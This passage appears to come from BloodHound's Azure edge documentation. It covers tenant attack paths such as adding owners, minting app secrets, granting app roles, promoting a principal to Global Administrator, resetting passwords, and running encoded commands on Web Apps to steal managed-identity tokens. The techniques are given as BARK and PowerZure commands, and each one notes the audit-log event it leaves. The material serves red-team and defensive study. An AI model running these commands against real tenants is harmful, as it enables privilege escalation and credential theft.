    -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
    -ClientSecret "asdf..." `
    -TenantName ""

Then use BARK’s Add-AZMemberToGroup function to add a new principial to the target group:

Add-AZMemberToGroup `
    -PrincipalID = "028362ca-90ae-41f2-ae9f-1a678cc17391" `
    -TargetGroupId "b9801b7a-fcec-44e2-a21b-86cb7ec718e4" `
    -Token $MGToken.access_token

Now you can re-authenticate as the principial you just added to the group and continue your attack path, now having whatever privileges the target group has.

Opsec Considerations

The Azure activity log for the tenant will log who added what principal to what group, including the date and time.


This edge is created during post-processing. It is created against all App Registrations and Service Principals within the same tenant when a Service Principal has the following MS Graph app role:

  • Application.ReadWrite.All

It is also created against all Azure Service Principals when a Service Principal has the following MS Graph app role:

  • ServicePrincipalEndpoint.ReadWrite.All

It is also created against all Azure security groups that are not role eligible when a Service Principal has one of the following MS Graph app roles:

  • Directory.ReadWrite.All
  • Group.ReadWrite.All

Finally, it is created against all Azure security groups and all Azure App Registrations when a Service Principal has the following MS Graph app role:

  • RoleManagement.ReadWrite.Directory

You will not see these privileges when auditing permissions against any of the mentioned objects when you use Microsoft tooling, including the Azure portal and the MS Graph API itself.

Abuse Info

You can use BARK to add a new owner to the target object. The BARK function you use will depend on the target object type, but all of the functions follow a similar syntax.

These functions require you to supply an MS Graph-scoped JWT associated with the Service Principal that has the privilege to add a new owner to the target object. There are several ways to acquire a JWT. For example, you may use BARK’s Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT by supplying a Service Principal Client ID and secret:

$MGToken = Get-MSGraphTokenWithClientCredentials `
    -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
    -ClientSecret "asdf..." `
    -TenantName ""

To add a new owner to a Service Principal, use BARK’s New-ServicePrincipalOwner function:

New-ServicePrincipalOwner `
    -ServicePrincipalObjectId "082cf9b3-24e2-427b-bcde-88ffdccb5fad" `
    -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `
    -Token $Token

To add a new owner to an App Registration, use BARK’s New-AppOwner function:

New-AppOwner `
    -AppObjectId "52114a0d-fa5b-4ee5-9a29-2ba048d46eee" `
    -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `
    -Token $Token

To add a new owner to a Group, use BARK’s New-GroupOwner function:

New-AppOwner `
    -GroupObjectId "352032bf-161d-4788-b77c-b6f935339770" `
    -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `
    -Token $Token

Opsec Considerations

Any time you add an owner to any Azure object, the AzureAD audit logs will create an event logging who added an owner to what object, as well as what the new owner added to the object was.


This edge is created during post-processing. It is created against all Azure App Registrations and Service Principals when a Service Principal has one of the following MS Graph app roles:

  • Application.ReadWrite.All
  • RoleManagement.ReadWrite.Directory

You will not see this privilege when using just the Azure portal or any other Microsoft tooling. If you audit the roles and administrators affecting any particular Azure App or Service Principal, you will not see that the Service Principal can add secrets to the object, but it indeed can because of the parallel access management system used by MS Graph.

Abuse Info

There are several ways to perform this abuse, depending on what sort of access you have to the credentials of the object that holds this privilege against the target object. If you have an interactive web browser session for the Azure portal, it is as simple as finding the target App in the portal and adding a new secret to the object using the “Certificates & secrets” tab. Service Principals do not have this tab in the Azure portal but you can add secrets to them with the MS Graph API. No matter what kind of control you have, you will be able to perform this abuse by using BARK’s New-AppRegSecret or New-ServicePrincipalSecret functions.

These functions require you to supply an MS Graph-scoped JWT associated with the Service Principal that has the privilege to add secrets to the target object. There are several ways to acquire a JWT. For example, you may use BARK’s Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT by supplying a Service Principal Client ID and secret:

$MGToken = Get-MSGraphTokenWithClientCredentials `
    -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
    -ClientSecret "asdf..." `
    -TenantName ""

Then use BARK’s New-AppRegSecret to add a new secret to the target application:

New-AppRegSecret `
    -AppRegObjectID "d878..." `
    -Token $MGToken.access_token

The output will contain the plain-text secret you just created for the target app:

New-AppRegSecret `
    -AppRegObjectID "d878..." `
    -Token $MGToken.access_token

Name                Value
----                -----
AppRegSecretValue   odg8Q~...
AppRegAppId         4d31...
AppRegObjectId      d878...

With this plain text secret, you can now acquire tokens as the service principal associated with the app. You can easily do this with BARK’s Get-MSGraphToken function:

$SPToken = Get-MSGraphToken `
    -ClientID "4d31..." `
    -ClientSecret "odg8Q~..." `
    -TenantName ""

Now you can use this JWT to perform actions against any other MS Graph endpoint as the service principal, continuing your attack path with the privileges of that service principal.

Opsec Considerations

When you create a new secret for an App or Service Principal, Azure creates an event called “Update application - Certificates and secrets management”. This event describes who added the secret to which application or service principal.


This edge is created when a Service Principal has been granted the Application.ReadWrite.All edge.

Abuse Info

The edge is not abusable, but is used during post-processing to create abusable edges.

Opsec Considerations

No opsec considerations apply to this edge.


This edge is created when a Service Principal has been granted the AppRoleAssignment.ReadWrite.All edge.

Abuse Info

The edge is not abusable, but is used during post-processing to create abusable edges.

Opsec Considerations

No opsec considerations apply to this edge.


This edge is created when a Service Principal has been granted the Directory.ReadWrite.All edge.

Abuse Info

The edge is not abusable, but is used during post-processing to create abusable edges.

Opsec Considerations

No opsec considerations apply to this edge.


This edge is created during post-processing. It is created against AzureAD tenant objects when a Service Principal has one of the following MS Graph app role assignments:

  • AppRoleAssignment.ReadWrite.All
  • RoleManagement.ReadWrite.Directory

Abuse Info

With the ability to grant arbitrary app roles, you can grant the RoleManagement.ReadWrite.Directory app role to a Service Principal you already control, and then promote it or another principal to Global Administrator.

These functions require you to supply an MS Graph-scoped JWT associated with the Service Principal that has the privilege to grant app roles. There are several ways to acquire a JWT. For example, you may use BARK’s Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT by supplying a Service Principal Client ID and secret:

$MGToken = Get-MSGraphTokenWithClientCredentials `
    -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
    -ClientSecret "asdf..." `
    -TenantName ""

Use BARK’s Get-AllAzureADServicePrincipals to collect all Service Principal objects in the tenant:

$SPs = Get-AllAzureADServicePrincipals `
    -Token $MGToken

Next, find the MS Graph Service Principal’s ID. You can do this by piping $SPs to Where-Object, finding objects where the appId value matches the universal ID for the MS Graph Service Principal, which is 00000003-0000-0000-c000-000000000000:

$SPs | ?{$_.appId -Like "00000003-0000-0000-c000-000000000000"} | Select id

The output will be the object ID of the MS Graph Service Principal. Take that ID and use it as the “ResourceID” argument for BARK’s New-AppRoleAssignment function. The AppRoleID of ‘9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8’ is the universal ID for RoleManagement.ReadWrite.Directory. The SPObjectId is the object ID of the Service Principal you want to grant this app role to:

New-AppRoleAssignment `
    -SPObjectId "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `
    -AppRoleID "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" `
    -ResourceID "9858020a-4c00-4399-9ae4-e7897a8333fa" `
    -Token $MGToken

If successful, the output of this command will show you the App Role assignment ID. Now that your Service Principal has the RoleManagement.ReadWrite.Directory MS Graph app role, you can promote the Service Principal to Global Administrator using BARK’s New-AzureADRoleAssignment.

New-AzureADRoleAssignment `
    -PrincipalID "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `
    -RoleDefinitionId "62e90394-69f5-4237-9190-012177145e10" `
    -Token $MGToken

If successful, the output will include the principal ID, the role ID, and a unique ID for the role assignment.

Opsec Considerations

When you assign an app role to a Service Principal, the Azure Audit logs will create an event called “Add app role assignment to service principal”. This event describes who made the change, what the target service principal was, and what app role assignment was granted.


This edge is created during post-processing. It is created against all AzureAD admin roles when a Service Principal has the following MS Graph app role assignment:

  • RoleManagement.ReadWrite.Directory

This privilege allows the Service Principal to promote itself or any other principal to any AzureAD admin role, including Global Administrator.

Abuse Info

To abuse this privilege, you can promote a principal you control to Global Administrator using BARK’s New-AzureADRoleAssignment. This function requires you to supply an MS Graph-scoped JWT associated with the Service Principal that has the privilege to grant AzureAD admin roles. There are several ways to acquire a JWT. For example, you may use BARK’s Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT by supplying a Service Principal Client ID and secret:

$MGToken = Get-MSGraphTokenWithClientCredentials `
    -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
    -ClientSecret "asdf..." `
    -TenantName ""

Then use BARK’s New-AzureADRoleAssignment function to grant the AzureAD role to your target principal:

New-AzureADRoleAssignment `
    -PrincipalID "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `
    -RoleDefinitionId "62e90394-69f5-4237-9190-012177145e10" `
    -Token $MGToken

If successful, the output will include the principal ID, the role ID, and a unique ID for the role assignment.

Opsec Considerations

When you assign an AzureAD admin role to a principal using this privilege, the Azure Audit log will create an event called “Add member to role outside of PIM (permanent)”.


This edge is created when a Service Principal has been granted the GroupMember.ReadWrite.All edge.

Abuse Info

The edge is not abusable, but is used during post-processing to create abusable edges.

Opsec Considerations

No opsec considerations apply to this edge.


This edge is created when a Service Principal has been granted the Group.ReadWrite.All edge.

Abuse Info

The edge is not abusable, but is used during post-processing to create abusable edges.

Opsec Considerations

No opsec considerations apply to this edge.


This edge is created when a Service Principal has been granted the RoleManagement.ReadWrite.Directory edge.

Abuse Info

The edge is not abusable, but is used during post-processing to create abusable edges.

Opsec Considerations

No opsec considerations apply to this edge.


This edge is created when a Service Principal has been granted the ServicePrincipalEndpoint.ReadWrite.All edge.

Abuse Info

The edge is not abusable, but is used during post-processing to create abusable edges.

Opsec Considerations

No opsec considerations apply to this edge.


This edge is created to link Azure Kubernetes Service Managed Clusters to the Virtual Machine Scale Sets they use to execute commands on.

The system-assigned identity for the AKS Cluster will have the Contributor role against the target Resource Group and its child Virtual Machine Scale Sets.

Abuse Info

You will abuse this relationship by executing a command against the AKS Managed Cluster the edge is emiting from. You can target any managed identity assignment scoped to the Virtual Machine Scale Sets under the target Resource Group.

Opsec Considerations

This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.


Object ownership means almost all abuses are possible against the target object.

Abuse Info

Everything a Contributor can do, with the addition of assigning rights to resources.

Opsec Considerations

This depends on which abuse you perform, but in general Azure will create a log for each abuse action.


This edge indicates the principal has the Privileged Authentication Administrator role active against the target tenant. Principals with this role can update sensitive properties for all users. Privileged Authentication Administrator can set or reset any authentication method (including passwords) for any user, including Global Administrators.

Abuse Info

See the abuse info under AZAddSecret or AZResetPassword.

Opsec Considerations

See the opsec consideration under AZAddSecret or AZResetPassword.


The Privileged Role Admin role can grant any other admin role to another principal at the tenant level.

Abuse Info

Activate the Global Admin role for yourself or for another user using PowerZure or PowerShell.

Opsec Considerations

The Azure Activity Log will log who activated an admin role for what other principal, including the date and time.


The ability to change another user’s password without knowing their current password.

Abuse Info

Find the user in the Azure portal, then click “Reset Password”, or use PowerZure’s Set-AzureUserPassword cmdlet. If password write-back is enabled, this password will also be set for a synced on-prem user.

Opsec Considerations

Azure will log each password reset event, including who performed the reset, against which account, and at what date and time.


The Azure App runs as the Service Principal when it needs to authenticate to the tenant.

Abuse Info

This edge should be taken into consideration when abusing control of an app. Apps authenticate with service principals to the tenant, so if you have control of an app, what you are abusing is that control plus the fact that the app runs as a privileged service principal.


The User Access Admin role can edit roles against many other objects.

Abuse Info

This role can be used to grant yourself or another principal any privilege you want against Automation Accounts, VMs, Key Vaults, and Resource Groups. Use the Azure portal to add a new, abusable role assignment against the target object for yourself.

Opsec Considerations

Azure will log any role activation event for any object type.


When a virtual machine is configured to allow logon with Azure AD credentials, the VM automatically has certain principals added to its local administrators group, including any principal granted the Virtual Machine Administrator Login (or “VMAL”) admin role.

Any principal granted this role, scoped to the affected VM, can connect to the VM via RDP and will be granted local admin rights on the VM.

Abuse Info

Connect to the VM via RDP and you will be granted local admin rights on the VM.

Opsec Considerations

If the target computer is a workstation and a user is currently logged on, one of two things will happen. If the user you are abusing is the same user as the one logged on, you will effectively take over their session and kick the logged on user off, resulting in a message to the user. If the users are different, you will be prompted to kick the currently logged on user off the system and log on. If the target computer is a server, you will be able to initiate the connection without issue provided the user you are abusing is not currently logged in.

Remote desktop will create Logon and Logoff events with the access type RemoteInteractive.


The Virtual Machine contributor role grants almost all abusable privileges against Virtual Machines.

Abuse Info

The Virtual Machine Contributor role allows you to run SYSTEM commands on the VM

Via PowerZure:

Opsec Considerations

Because you’ll be running a command as the SYSTEM user on the Virtual Machine, the same opsec considerations for running malicious commands on any system should be taken into account: command line logging, PowerShell script block logging, EDR, etc.


The Website Contributor role grants full control of the target Function App or Web App. Full control of either of those types of resources allows for arbitrary command execution against the target resoruce.

Abuse Info

You can use BARK’s Invoke-AzureRMWebAppShellCommand function to execute commands on a target Web App. You can use BARK’s New-PowerShellFunctionAppFunction, Get-AzureFunctionAppMasterKeys, and Get-AzureFunctionOutput functions to execute arbitrary commands against a target Function App.

These functions require you to supply an Azure Resource Manager scoped JWT associated with the principal that has the privilege to execute commands on the web app or function app. There are several ways to acquire a JWT. For example, you may use BARK’s Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT by supplying a refresh token:

$ARMToken = Get-ARMTokenWithRefreshToken `
    -RefreshToken "0.ARwA6WgJJ9X2qk..." `
    -TenantID ""

Now you can use BARK’s Invoke-AzureRMWebAppShellCommand function to execute a command against the target Web App. For example, to run a simple “whoami” command:

Invoke-AzureRMWebAppShellCommand `
    -KuduURI "" `
    -Token $ARMToken `
    -Command "whoami"

If the Web App has a managed identity assignments, you can use BARK’s Invoke-AzureRMWebAppShellCommand function to retrieve a JWT for the managed identity Service Principal like this:

PS C:\> $PowerShellCommand =
        $response = Invoke-WebRequest -UseBasicParsing -Uri "$($env:IDENTITY_ENDPOINT)?resource=" -Headers $headers

PS C:\> $base64Cmd = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($PowerShellCommand))

PS C:\> $Command = "powershell -enc $($base64Cmd)"

PS C:\> Invoke-AzureRMWebAppShellCommand `
        -KuduURI "" `
        -token $ARMToken `
        -Command $Command

If successful, the output will include a JWT for the managed identity service principal.

Opsec Considerations

This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.